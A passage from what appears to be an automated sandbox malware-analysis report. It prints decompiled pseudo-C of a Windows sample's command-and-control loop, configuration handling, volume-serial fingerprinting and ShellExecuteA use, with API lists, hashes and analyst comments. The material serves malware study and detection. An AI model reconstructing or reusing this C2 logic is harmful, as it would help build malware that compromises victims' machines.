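Running the dry run shows why the stored value is useful to an analyst: the low byte of the word at 0x412180 is the zero-based index of the script line that failed, so a memory dump taken after a failed C2 script tells you exactly which command the operator tried last.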
Address column (one instruction address per decompiled line above, in order; 0x00000000 marks lines with no address):
0x004091f4 0x004091fb 0x00409201 0x00409208 0x00409308 0x00000000 0x00000000 0x00000000
0x00000000 0x0040920e 0x0040920e 0x00409216 0x0040921c 0x0040923f 0x00409241 0x00409249
0x0040924b 0x0040924b 0x00409259 0x0040925e 0x00409261 0x00409270 0x00000000 0x00409272
0x00409279 0x0040927f 0x00000000 0x0040929b 0x0040928e 0x0040928e 0x0040928f 0x00409293
0x00000000 0x00000000 0x0040928c 0x0040929a 0x0040929a 0x00000000 0x0040929a 0x0040928c
0x00409298 0x00000000 0x004092a8 0x004092a5 0x004092b2 0x004092b2 0x004092b5 0x004092b5
0x004092b6 0x004092bf 0x004092cf 0x004092d5 0x004092db 0x00409319 0x0040931f 0x00000000
0x00000000 0x00000000 0x00000000 0x004092dd 0x004092dd 0x004092dd 0x004092e1 0x00000000
0x00000000 0x004092e7 0x004092e7 0x00000000 0x004092dd 0x004092a7 0x004092a7 0x004092b0
0x004092bd 0x00000000 0x004092bd 0x00000000 0x004092b0 0x00000000 0x00409298 0x00000000
0x00000000 0x00000000 0x00000000 0x00409281 0x00409281 0x00409281 0x00409282 0x00000000
0x00409287 0x00409270 0x00409226 0x0040922c 0x00000000 0x00000000 0x0040922e 0x00409230
0x00409230 0x00409233 0x00409233 0x00409235 0x00409236 0x0040923c 0x00000000 0x004092ea
0x004092ed 0x004092ef 0x004092f6 0x004092f6 0x004092fc 0x004092ff 0x00000000

                                                                                                                                  APIs
                                                                                                                                  • ShellExecuteA.SHELL32(00000000,00000000,00000020,00000023,00000000,00000000), ref: 004092CF
                                                                                                                                  • Sleep.KERNELBASE(000001F4,00000000,00000000,000000C8), ref: 004092F6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExecuteShellSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4194306370-0
                                                                                                                                  • Opcode ID: f04ce0a36b1e0340726d5e5c72fce4fe20aaa33147c233af0dd5a9c46ca05612
                                                                                                                                  • Instruction ID: 91eefd9640bbaae20ce027590a47b9066bf8b1017d1ec6fca77516d99313e2d1
                                                                                                                                  • Opcode Fuzzy Hash: f04ce0a36b1e0340726d5e5c72fce4fe20aaa33147c233af0dd5a9c46ca05612
                                                                                                                                  • Instruction Fuzzy Hash: A841EE718083497EEB269664988C7E73BA49B52300F2809FFD496B72D3D7BC4D818759
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph (function at 00AD0E0F, from the report's graph view)

• Block 911 (ad0e0f-ad0e24): calls SetErrorMode twice (0x400, then 0); edges to 912 and 913
• Block 913 (ad0e26): edge to 912
• Block 912 (ad0e2b-ad0e2c)

Note: 0x400 is not one of the documented SEM_* flags (SEM_FAILCRITICALERRORS 0x0001, SEM_NOGPFAULTERRORBOX 0x0002, SEM_NOALIGNMENTFAULTEXCEPT 0x0004, SEM_NOOPENFILEERRORBOX 0x8000); the branch after the second call is on the value the first call set.
                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNELBASE(00000400,?,?,00AD0223,?,?), ref: 00AD0E19
                                                                                                                                  • SetErrorMode.KERNELBASE(00000000,?,?,00AD0223,?,?), ref: 00AD0E1E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorMode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                  • Instruction ID: a9632d23071adbd0ec66f12c24e7b7b65cefad4dbdad83abc177024c35e07623
                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                  • Instruction Fuzzy Hash: D7D012311451287BD7002B94DC09BCD7B1CDF05B62F008411FB0DD9180CB70994046E5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00406DC2(void* __ecx) {
                                                                                                                                  				char _v261;
                                                                                                                                  				char _v264;
                                                                                                                                  				long _t6;
                                                                                                                                  				intOrPtr* _t10;
                                                                                                                                  				int _t13;
                                                                                                                                  				intOrPtr _t20;
                                                                                                                                  				void* _t21;
                                                                                                                                  
                                                                                                                                  				_t6 =  *0x412f0c; // 0x50e39a9a -- cached value; only computed on the first call
                                                                                                                                  				if(_t6 == 0) {
                                                                                                                                  					// E00406CC9 returns a system directory path (see the subcall APIs listed below); copy it into _v264
                                                                                                                                  					E0040EF00( &_v264, E00406CC9(__ecx));
                                                                                                                                  					_t10 =  &_v264;
                                                                                                                                  					_t21 = _t10 + 1;
                                                                                                                                  					do { // inline strlen over the copied path
                                                                                                                                  						_t20 =  *_t10;
                                                                                                                                  						_t10 = _t10 + 1;
                                                                                                                                  					} while (_t20 != 0);
                                                                                                                                  					if(_t10 - _t21 < 3) {
                                                                                                                                  						L5:
                                                                                                                                  						 *0x412f0c = 0x5e5e5e5e; // fallback constant when the path is too short or the volume query fails
                                                                                                                                  					} else {
                                                                                                                                  						_v261 = 0; // truncate the path to its first three characters (the drive root, e.g. C:\)
                                                                                                                                  						_t13 = GetVolumeInformationA( &_v264, 0, 0, 0x412f0c, 0, 0, 0, 0); // executed; stores the volume serial number in the global at 0x412f0c
                                                                                                                                  						if(_t13 == 0) {
                                                                                                                                  							goto L5;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t6 =  *0x412f0c; // 0x50e39a9a
                                                                                                                                  				}
                                                                                                                                  				return _t6;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00406CC9: GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,PromptOnSecureDesktop,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                                                                    • Part of subcall function 00406CC9: GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                                                                    • Part of subcall function 00406CC9: GetSystemDirectoryA.KERNEL32 ref: 00406D14
                                                                                                                                    • Part of subcall function 00406CC9: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                                                                  • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000,000000C8), ref: 00406E1A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Directory$AddressHandleInformationModuleProcSystemVolumeWindows
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1823874839-0
                                                                                                                                  • Opcode ID: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
                                                                                                                                  • Instruction ID: 937aca74520052d45988c2d0c0f169875d4d0bc257a2eacc80ff7e120b8985ce
                                                                                                                                  • Opcode Fuzzy Hash: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
                                                                                                                                  • Instruction Fuzzy Hash: 75F0C2B6104218AFD710DB64EDC4EE777EED714308F1084B6E286E3145D6B89DA85B6C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • __encode_pointer.LIBCMTD ref: 00416F07
                                                                                                                                    • Part of subcall function 00416E30: __crt_wait_module_handle.LIBCMTD ref: 00416E7C
                                                                                                                                    • Part of subcall function 00416E30: RtlEncodePointer.NTDLL(?), ref: 00416EB7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EncodePointer__crt_wait_module_handle__encode_pointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2010845264-0
                                                                                                                                  • Opcode ID: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                                                                                                                                  • Instruction ID: f8527b63a1fa4e1e3ea2e981291df3c9c0dfee618300b93caa5b292de4cdc523
                                                                                                                                  • Opcode Fuzzy Hash: f00befe9f6ce37f0a9e0ee05923ac5330ac6df44ba7645856ef0dc2498812e42
                                                                                                                                  • Instruction Fuzzy Hash: 4BA0127644430833D00020877803B02390D43C0638F090021F50C051426842E4508097
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 00AD0929
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProcessTerminate
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 560597551-0
                                                                                                                                  • Opcode ID: da867de32a73d219b0bc9e6a28ac5a3a58dd16c851dad49baea75ca192e4b327
                                                                                                                                  • Instruction ID: eb0777e9622a16cb38e332e54065874c7edd3c96b1fc6f0c0f8d9bfaef48390b
                                                                                                                                  • Opcode Fuzzy Hash: da867de32a73d219b0bc9e6a28ac5a3a58dd16c851dad49baea75ca192e4b327
                                                                                                                                  • Instruction Fuzzy Hash: 0D90047034415051DC3035DD0C07F0500411751770F310710F134FF1D5DC44551001FD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E0040C913() {
                                                                                                                                  				CHAR* _v8;
                                                                                                                                  				CHAR* _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				signed int _v17;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v35;
                                                                                                                                  				CHAR* _v39;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				long _v56;
                                                                                                                                  				CHAR* _v60;
                                                                                                                                  				CHAR* _v64;
                                                                                                                                  				CHAR* _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				char _v92;
                                                                                                                                  				char _v96;
                                                                                                                                  				long _v100;
                                                                                                                                  				intOrPtr _v104;
                                                                                                                                  				struct _PROCESS_INFORMATION _v120;
                                                                                                                                  				char _v408;
                                                                                                                                  				struct _PROCESS_INFORMATION _v424;
                                                                                                                                  				char _v440;
                                                                                                                                  				intOrPtr _v492;
                                                                                                                                  				intOrPtr _v496;
                                                                                                                                  				intOrPtr _v500;
                                                                                                                                  				intOrPtr _v508;
                                                                                                                                  				intOrPtr _v512;
                                                                                                                                  				char _v640;
                                                                                                                                  				intOrPtr _v688;
                                                                                                                                  				intOrPtr _v720;
                                                                                                                                  				intOrPtr _v728;
                                                                                                                                  				intOrPtr _v732;
                                                                                                                                  				CHAR* _v736;
                                                                                                                                  				char _v740;
                                                                                                                                  				struct _STARTUPINFOA _v808;
                                                                                                                                  				struct _STARTUPINFOA _v876;
                                                                                                                                  				char _v1176;
                                                                                                                                  				void* __ebp;
                                                                                                                                  				intOrPtr _t362;
                                                                                                                                  				intOrPtr _t368;
                                                                                                                                  				void* _t369;
                                                                                                                                  				signed int _t388;
                                                                                                                                  				signed int _t392;
                                                                                                                                  				signed int _t395;
                                                                                                                                  				signed int _t398;
                                                                                                                                  				CHAR* _t403;
                                                                                                                                  				signed int _t408;
                                                                                                                                  				signed int _t409;
                                                                                                                                  				signed int _t410;
                                                                                                                                  				signed int _t413;
                                                                                                                                  				signed int _t416;
                                                                                                                                  				void* _t417;
                                                                                                                                  				CHAR* _t418;
                                                                                                                                  				signed int _t421;
                                                                                                                                  				CHAR* _t428;
                                                                                                                                  				signed int _t429;
                                                                                                                                  				signed int _t434;
                                                                                                                                  				signed int _t438;
                                                                                                                                  				signed int _t439;
                                                                                                                                  				signed int _t441;
                                                                                                                                  				signed int _t449;
                                                                                                                                  				signed int _t453;
                                                                                                                                  				signed int _t456;
                                                                                                                                  				signed int _t459;
                                                                                                                                  				signed int _t462;
                                                                                                                                  				signed int _t463;
                                                                                                                                  				signed int _t467;
                                                                                                                                  				signed int _t472;
                                                                                                                                  				signed int _t473;
                                                                                                                                  				signed int _t476;
                                                                                                                                  				signed int _t478;
                                                                                                                                  				signed int _t479;
                                                                                                                                  				CHAR* _t483;
                                                                                                                                  				signed int _t485;
                                                                                                                                  				signed int _t488;
                                                                                                                                  				signed int _t489;
                                                                                                                                  				signed int _t491;
				CHAR* _t492;
				long _t494;
				signed int _t499;
				signed int _t500;
				signed int _t501;
				char* _t502;
				intOrPtr* _t513;
				signed int _t514;
				signed int _t527;
				signed int _t541;
				signed int _t545;
				signed int _t552;
				intOrPtr* _t559;
				signed int _t560;
				signed int _t571;
				signed int _t575;
				signed int _t579;
				signed int _t583;
				signed int _t588;
				signed char _t590;
				signed int _t591;
				intOrPtr* _t595;
				signed int _t596;
				signed int _t599;
				void* _t602;
				intOrPtr* _t607;
				char* _t609;
				CHAR* _t613;
				intOrPtr _t615;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t621;
				signed int _t624;
				CHAR* _t630;
				void* _t632;
				signed int _t634;
				CHAR* _t636;
				void* _t642;
				signed int _t644;
				void* _t651;
				int _t657;
				int _t673;
				signed int _t681;
				CHAR* _t686;
				intOrPtr _t688;
				void* _t695;
				signed int _t705;
				signed int _t709;
				signed int _t711;
				signed int _t712;
				signed int _t723;
				char* _t726;
				char _t733;
				char _t734;
				char* _t736;
				void* _t738;
				signed int _t747;
				signed int _t748;
				signed int _t758;
				signed int _t760;
				void* _t763;
				signed int _t764;
				signed int _t765;
				void* _t766;
				void* _t768;
				void* _t769;
				long _t770;
				void* _t773;
				void* _t774;
				void* _t775;
				intOrPtr* _t776;
				intOrPtr* _t777;
				void* _t779;
				void* _t781;
				void* _t782;
				signed int _t789;
				signed int _t791;
				signed int _t793;
				signed int _t795;
				CHAR* _t796;
				CHAR* _t797;
				signed int* _t798;
				signed int _t801;
				long _t803;
				signed int _t805;
				void* _t806;
				void* _t807;
				void* _t808;
				void* _t809;
				void* _t811;

				_v64 = 0;
				_v68 = 0;
				if( *0x41366c == 0 ||  *0x413670 == 0) {
					E0040C517();
				}
				if( *0x41366c == 0 ||  *0x413670 == 0) {
					L21:
					__eflags = 0;
					return 0;
				} else {
					// Three values are read from the "time_cfg" section (keys wtm_c, wtm_w, wtm_r)
					// with the numeric defaults 0x14, 0x28, 0x28 and stored at 0x412104, 0x41210c, 0x412108.
					 *0x412104 = E0040E819(1, "time_cfg", "wtm_c", 0x14);
					 *0x41210c = E0040E819(1, "time_cfg", "wtm_w", 0x28);
					_t362 = E0040E819(1, "time_cfg", "wtm_r", 0x28);
					_t808 = _t807 + 0x30;
					 *0x412108 = _t362;
					if( *0x4136b0 != 0) {
						L7:
						_t747 =  *0x413674;
						_t688 =  *0x41366c;
						_v12 = 0;
						// Entry selected from a table of 0x45-byte records at *0x41366c, indexed by *0x413674.
						if( *((intOrPtr*)(_t747 * 0x45 + _t688 + 0x41)) != 0) {
							L11:
							_t748 = _t747 * 0x45;
							_t365 = _t748 + _t688;
							_t689 =  *((intOrPtr*)(_t748 + _t688 + 0x41));
							if( *((intOrPtr*)(_t748 + _t688 + 0x41)) == 0) {
								goto L21;
							}
							_t368 = E0040F428(E00402684(_t365 + 1), _t689);
							_v16 = _t368;
							_t829 = _t368;
							if(_t368 > 0) {
								// Exactly 0xc8 (200) bytes are expected into _v640; anything else skips the block below.
								_t369 = E0040F43E(_t368,  &_v640, 0xc8, 0);
								_t809 = _t808 + 0x10;
								__eflags = _t369 - 0xc8;
								if(__eflags == 0) {
									E00408F53( &_v640, 0xc8);
									// Sanity checks on the received buffer: _v500 <= 0xff, _v512 <= 7, _v508 <= 7.
									__eflags = _v500 - 0xff;
									_pop(_t695);
									if(__eflags > 0) {
										goto L15;
									}
									__eflags = _v512 - 7;
									if(__eflags > 0) {
										goto L15;
									}
									__eflags = _v508 - 7;
									if(__eflags > 0) {
										goto L15;
									}
									 *0x413684 = 1;
									 *0x413678 = 0;
									 *0x41367c = 0;
									// Values written to the "localcfg" section: ip, srv_time, local_time.
									E0040EA84(1, "localcfg", "ip", _v496);
									_v104 = E0040F04E(0);
									_v100 = _t748;
									E0040EA84(1, "localcfg", "srv_time", _v492);
									E0040EA84(1, "localcfg", "local_time", _v104);
									E00408FB6( &_v440,  &_v640);
									E00408FB6( &_v92,  &_v640);
									E0040EE2A(_t695,  &_v740, 0, 0x64);
									_v728 = 1;
									// 0x100007f is 127.0.0.1 stored as a little-endian dword in network byte order.
									_v688 = 0x100007f;
									_v732 = 1;
									_v720 = 0x1f;
									_v736 = 0;
									_v39 = 0x37;
									_t388 = E0040C65C(_v16,  &_v640,  &_v92, 0x412118, 0x64,  &_v52);
									_t811 = _t809 + 0x68;
									__eflags = _t388;
									if(_t388 > 0) {
										 *0x412148 = 0;
										 *0x41215a = 0;
										while(1) {
											L24:
											_t757 = _v16;
											// Main loop: a return of -2 (0xfffffffe) ends the loop, any other negative
											// return retries; _v39 then selects the handler for the received message.
											_t392 = E0040C75D(_v16,  &_v640,  &_v440,  *0x4136b0, 0x100000,  &_v52);
											_t811 = _t811 + 0x18;
											__eflags = _t392 - 0xfffffffe;
											if(_t392 == 0xfffffffe) {
												break;
											}
											__eflags = _t392;
											if(_t392 < 0) {
												continue;
											}
											_t395 = _v39;
											__eflags = _t395;
											if(_t395 == 0) {
												// Scan bits 1..31 of _v35. For every set bit whose slot at 0x41215c + bit
												// is still zero (bit 3 excluded), the bit index is formatted into _v96
												// and handed to E0040E654 together with E00408C51.
												_t789 = 1;
												__eflags = 1;
												do {
													_t398 = 1 << _t789;
													__eflags = _v35 & _t398;
													if((_v35 & _t398) != 0) {
														__eflags =  *(_t789 + 0x41215c);
														if( *(_t789 + 0x41215c) == 0) {
															__eflags = _t789 - 3;
															if(_t789 != 3) {
																E0040F1ED(_t789,  &_v96, 0xa);
																E0040E654(E00408C51, 5,  &_v96);
																_t811 = _t811 + 0x18;
															}
														}
													}
													_t789 = _t789 + 1;
													__eflags = _t789 - 0x20;
												} while (_t789 < 0x20);
												continue;
											}
											__eflags = _t395 - 1;
											if(_t395 == 1) {
												_t403 =  *0x4136b0;
												_t697 =  *_t403;
												_v24 = _t697;
												_t748 = _t403[4];
												_v76 = _t748;
												// Individual flag bits of _v24 are tested in sequence (0x18, 0x01, 0x04,
												// 0x40, 0x80, 0x100, 0x400); a clear bit falls through to the next label.
												__eflags = _t697 & 0x00000018;
												if((_t697 & 0x00000018) == 0) {
													L177:
													__eflags = _v24 & 0x00000001;
													if((_v24 & 0x00000001) == 0) {
														L179:
														__eflags = _v24 & 0x00000004;
														if((_v24 & 0x00000004) == 0) {
															L182:
															__eflags = _v24 & 0x00000040;
															if((_v24 & 0x00000040) == 0) {
																L186:
																__eflags = _v24 & 0x00000080;
																if((_v24 & 0x00000080) == 0) {
																	L199:
																	__eflags = _v24 & 0x00000100;
																	if((_v24 & 0x00000100) == 0) {
																		L204:
																		__eflags = _v24 & 0x00000400;
																		if((_v24 & 0x00000400) == 0) {
																			L215:
																			_v8 = 0;
																			while(1) {
																				__eflags = _v64;
                                                                                                                                  																				if(_v64 != 0) {
                                                                                                                                  																					goto L228;
                                                                                                                                  																				}
                                                                                                                                  																				_t758 = _v8[0x413300];
                                                                                                                                  																				__eflags = _t758;
                                                                                                                                  																				if(_t758 == 0) {
                                                                                                                                  																					L225:
                                                                                                                                  																					_v8 =  &(_v8[4]);
                                                                                                                                  																					__eflags = _v8 - 0x80;
                                                                                                                                  																					if(_v8 < 0x80) {
                                                                                                                                  																						continue;
                                                                                                                                  																					}
                                                                                                                                  																					__eflags = _v64;
                                                                                                                                  																					if(_v64 != 0) {
                                                                                                                                  																						goto L228;
                                                                                                                                  																					}
                                                                                                                                  																					_v39 = 0;
                                                                                                                                  																					_t408 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, 0,  &_v52);
                                                                                                                                  																					_t811 = _t811 + 0x18;
                                                                                                                                  																					__eflags = _t408;
                                                                                                                                  																					if(_t408 > 0) {
                                                                                                                                  																						goto L24;
                                                                                                                                  																					}
                                                                                                                                  																					goto L228;
                                                                                                                                  																				}
                                                                                                                                  																				_t409 =  *(_t758 + 0x4c);
                                                                                                                                  																				__eflags = _t409;
                                                                                                                                  																				if(_t409 == 0) {
                                                                                                                                  																					goto L225;
                                                                                                                                  																				}
                                                                                                                                  																				_t410 =  *_t409( &_v76,  &_v39,  *0x4136b0, 0x100000);
                                                                                                                                  																				while(1) {
                                                                                                                                  																					_t811 = _t811 + 0x10;
                                                                                                                                  																					_v52 = _t410;
                                                                                                                                  																					__eflags = _t410;
                                                                                                                                  																					if(_t410 <= 0) {
                                                                                                                                  																						break;
                                                                                                                                  																					}
                                                                                                                                  																					_t413 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, _t410,  &_v52);
                                                                                                                                  																					_t811 = _t811 + 0x18;
                                                                                                                                  																					__eflags = _t413;
                                                                                                                                  																					if(_t413 <= 0) {
                                                                                                                                  																						_v64 = 1;
                                                                                                                                  																						goto L225;
                                                                                                                                  																					}
                                                                                                                                  																					_t410 =  *(_t758 + 0x4c)( &_v76,  &_v39,  *0x4136b0, 0x100000);
                                                                                                                                  																				}
                                                                                                                                  																				goto L225;
                                                                                                                                  																			}
                                                                                                                                  																			break;
                                                                                                                                  																		}
                                                                                                                                  																		_t416 = E00407DD6(_t748);
                                                                                                                                  																		__eflags = _t416;
                                                                                                                                  																		if(_t416 != 0) {
                                                                                                                                  																			goto L215;
                                                                                                                                  																		}
                                                                                                                                  																		_t417 = E0040F04E(0);
                                                                                                                                  																		__eflags =  *0x4136ac - _t748;
                                                                                                                                  																		if(__eflags > 0) {
                                                                                                                                  																			goto L215;
                                                                                                                                  																		}
                                                                                                                                  																		if(__eflags < 0) {
                                                                                                                                  																			L209:
                                                                                                                                  																			__eflags =  *0x4121a8; // 0x0
                                                                                                                                  																			if(__eflags == 0) {
                                                                                                                                  																				goto L215;
                                                                                                                                  																			}
                                                                                                                                  																			__eflags =  *0x4121a4; // 0x0
                                                                                                                                  																			if(__eflags != 0) {
                                                                                                                                  																				L214:
                                                                                                                                  																				_t418 =  *0x4136b0;
                                                                                                                                  																				 *_t418 = 0;
                                                                                                                                  																				_t733 =  *0x4121a4; // 0x0
                                                                                                                                  																				_t418[4] = _t733;
                                                                                                                                  																				_t734 =  *0x4122d4; // 0x0
                                                                                                                                  																				_t418[8] = _t734;
                                                                                                                                  																				_v39 = 0x34;
                                                                                                                                  																				_t421 = E0040C65C(_v16,  &_v640,  &_v92, _t418, 0xc,  &_v52);
                                                                                                                                  																				_t811 = _t811 + 0x18;
                                                                                                                                  																				__eflags = _t421;
                                                                                                                                  																				if(_t421 <= 0) {
                                                                                                                                  																					break;
                                                                                                                                  																				}
                                                                                                                                  																				goto L215;
                                                                                                                                  																			}
                                                                                                                                  																			_t791 = E0040675C(0x4121a8,  &_v72, 0);
                                                                                                                                  																			_t811 = _t811 + 0xc;
                                                                                                                                  																			__eflags = _t791;
                                                                                                                                  																			if(_t791 != 0) {
                                                                                                                                  																				 *0x4122d4 = E004024C2(_t791, _v72, 0);
                                                                                                                                  																				 *0x4121a4 = _v72;
                                                                                                                                  																				E0040EC2E(_t791);
                                                                                                                                  																				_t811 = _t811 + 0x10;
                                                                                                                                  																			}
                                                                                                                                  																			__eflags =  *0x4121a4; // 0x0
                                                                                                                                  																			if(__eflags == 0) {
                                                                                                                                  																				goto L215;
                                                                                                                                  																			} else {
                                                                                                                                  																				goto L214;
                                                                                                                                  																			}
                                                                                                                                  																		}
                                                                                                                                  																		__eflags =  *0x4136a8 - _t417;
                                                                                                                                  																		if( *0x4136a8 > _t417) {
                                                                                                                                  																			goto L215;
                                                                                                                                  																		}
                                                                                                                                  																		goto L209;
                                                                                                                                  																	}
                                                                                                                                  																	E0040E854(1, "localcfg", "except_info",  *0x4136b0, 0x100000, 0x410264);
                                                                                                                                  																	_t428 =  *0x4136b0;
                                                                                                                                  																	_t811 = _t811 + 0x18;
                                                                                                                                  																	_t736 =  &(_t428[1]);
                                                                                                                                  																	do {
                                                                                                                                  																		_t748 =  *_t428;
                                                                                                                                  																		_t428 =  &(_t428[1]);
                                                                                                                                  																		__eflags = _t748;
                                                                                                                                  																	} while (_t748 != 0);
                                                                                                                                  																	_t429 = _t428 - _t736;
                                                                                                                                  																	_v12 = _t429;
                                                                                                                                  																	__eflags = _t429;
                                                                                                                                  																	if(_t429 <= 0) {
                                                                                                                                  																		goto L204;
                                                                                                                                  																	}
                                                                                                                                  																	E0040E8A1(_t748, 1, "localcfg", "except_info", 0x410264);
                                                                                                                                  																	_v39 = 0xf;
                                                                                                                                  																	_t434 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, _v12,  &_v52);
                                                                                                                                  																	_t811 = _t811 + 0x28;
                                                                                                                                  																	__eflags = _t434;
                                                                                                                                  																	if(_t434 <= 0) {
                                                                                                                                  																		break;
                                                                                                                                  																	}
                                                                                                                                  																	goto L204;
                                                                                                                                  																}
                                                                                                                                  																_t760 = 0;
                                                                                                                                  																__eflags =  *0x412184; // 0x0
                                                                                                                                  																if(__eflags != 0) {
                                                                                                                                  																	E00406F5F( &_v408, 0x120);
                                                                                                                                  																	_t449 =  *0x412130; // 0x0
                                                                                                                                  																	_push(0x412184);
                                                                                                                                  																	asm("sbb eax, eax");
                                                                                                                                  																	_push( &_v408);
                                                                                                                                  																	_t453 = ( ~(_t449 & 0x00000600) & 0x00000020) + 0x20;
                                                                                                                                  																	__eflags = _t453;
                                                                                                                                  																	_push(_t453);
                                                                                                                                  																	_push( *0x412159 & 0x000000ff);
                                                                                                                                  																	_push( *0x412134);
                                                                                                                                  																	_push( *0x412120);
                                                                                                                                  																	_t456 = wsprintfA( *0x4136b0, E00402544("PromptOnSecureDesktop", 0x410fa0, 0x27, 0xe4, 0xc8));
                                                                                                                                  																	_t811 = _t811 + 0x34;
                                                                                                                                  																	_t760 = _t456;
                                                                                                                                  																}
                                                                                                                                  																_t793 =  *0x4122d8; // 0x0
                                                                                                                                  																__eflags = _t793;
                                                                                                                                  																if(_t793 == 0) {
                                                                                                                                  																	L193:
                                                                                                                                  																	__eflags = _t760;
                                                                                                                                  																	if(_t760 == 0) {
                                                                                                                                  																		goto L199;
                                                                                                                                  																	}
                                                                                                                                  																	_v39 = 0xb;
                                                                                                                                  																	_t438 = E0040C65C(_v16,  &_v640,  &_v92,  *0x4136b0, _t760,  &_v52);
                                                                                                                                  																	_t811 = _t811 + 0x18;
                                                                                                                                  																	__eflags = _t438;
                                                                                                                                  																	if(_t438 <= 0) {
                                                                                                                                  																		break;
                                                                                                                                  																	}
                                                                                                                                  																	__eflags =  *0x412184; // 0x0
																	if(__eflags != 0) {
																		 *0x412184 = 0;
																	}
																	_t439 =  *0x4122d8; // 0x0
																	__eflags = _t439;
																	if(_t439 != 0) {
																		E0040EC2E(_t439);
																		 *0x4122d8 = 0;
																	}
																	goto L199;
																} else {
																	_t441 = _t793;
																	_t293 = _t441 + 1; // 0x1
																	_t738 = _t293;
																	do {
																		_t748 =  *_t441;
																		_t441 = _t441 + 1;
																		__eflags = _t748;
																	} while (_t748 != 0);
																	_v60 = _t441 - _t738;
																	E0040EE08( &(( *0x4136b0)[_t760]), _t793, _t441 - _t738 + 1);
																	_t811 = _t811 + 0xc;
																	_t760 =  &(_v60[_t760]);
																	__eflags = _t760;
																	goto L193;
																}
															}
															while(1) {
																_t459 = E0040C06C( &_v24,  &_v39,  *0x4136b0, 0x100000);
																_t811 = _t811 + 0x10;
																__eflags = _t459;
																if(_t459 == 0) {
																	goto L186;
																}
																_t462 = E0040C65C(_t757,  &_v640,  &_v92,  *0x4136b0, _t459,  &_v52);
																_t811 = _t811 + 0x18;
																__eflags = _t462;
																if(_t462 <= 0) {
																	goto L228;
																}
															}
															goto L186;
														}
														_push(0x71c7);
														_push( *0x4136b0);
														_t463 = E0040E7B4();
														__eflags = _t463;
